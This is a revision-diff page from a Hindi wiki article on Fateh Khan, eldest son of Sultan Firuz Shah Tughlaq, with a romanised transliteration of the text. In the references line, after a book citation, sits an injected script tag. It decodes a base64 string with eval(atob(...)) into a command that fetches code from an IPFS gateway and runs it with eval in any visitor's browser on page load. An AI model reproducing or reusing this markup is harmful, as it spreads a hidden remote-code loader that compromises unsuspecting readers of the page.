Difference between revisions of "फ़तेह ख़ाँ (फ़िरोजशाह तुग़लक़ पुत्र)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
Line 1: Line 1:
 
'''फ़तेह ख़ाँ''' सुल्तान [[फ़िरोज़शाह तुग़लक़|फ़िरोजशाह तुग़लक़]] (1351-1388 ई.) का सबसे बड़ा पुत्र था।
 
'''फ़तेह ख़ाँ''' सुल्तान [[फ़िरोज़शाह तुग़लक़|फ़िरोजशाह तुग़लक़]] (1351-1388 ई.) का सबसे बड़ा पुत्र था।
 
*फ़िरोजशाह तुग़लक़ की मृत्यु से पूर्व ही फ़तेह ख़ाँ की मृत्यु हो गई थी।
 
*फ़िरोजशाह तुग़लक़ की मृत्यु से पूर्व ही फ़तेह ख़ाँ की मृत्यु हो गई थी।
*उसका बड़ा लड़का [[ग़यासुद्दीन तुग़लक़ द्वितीय]] अपने बाबा सुल्तान फ़िरोजशाह तुग़लक़ की मृत्यु के पश्चात [[दिल्ली]] की गद्दी पर बैठा।
+
*उसका बड़ा लड़का [[ग़यासुद्दीन तुग़लक़ द्वितीय]] अपने बाबा सुल्तान फ़िरोजशाह तुग़लक़ की मृत्यु के पश्चात् [[दिल्ली]] की गद्दी पर बैठा।
 
*गद्दी पर बैठने के कुछ ही महीनों उसे अपदस्थ करके उसकी हत्या कर दी गई।
 
*गद्दी पर बैठने के कुछ ही महीनों उसे अपदस्थ करके उसकी हत्या कर दी गई।
 
*फ़तेहख़ाँ का दूसरा लड़का [[नसरत शाह तुग़लक़]], [[तुग़लक़ वंश]] का उपांतिम सुल्तान था।
 
*फ़तेहख़ाँ का दूसरा लड़का [[नसरत शाह तुग़लक़]], [[तुग़लक़ वंश]] का उपांतिम सुल्तान था।

Latest revision as of 07:50, 23 June 2017

fateh khaan sultan firojashah tugalaq (1351-1388 ee.) ka sabase b da putr tha.

  • firojashah tugalaq ki mrityu se poorv hi fateh khaan ki mrityu ho gee thi.
  • usaka b da l daka gayasuddin tugalaq dvitiy apane baba sultan firojashah tugalaq ki mrityu ke pashchath dilli ki gaddi par baitha.
  • gaddi par baithane ke kuchh hi mahinoan use apadasth karake usaki hatya kar di gee.
  • fatehakhaan ka doosara l daka nasarat shah tugalaq, tugalaq vansh ka upaantim sultan tha.
  • nasarat shah tugalaq ne 1395 se 1399 ee. tak shasan kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 253 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh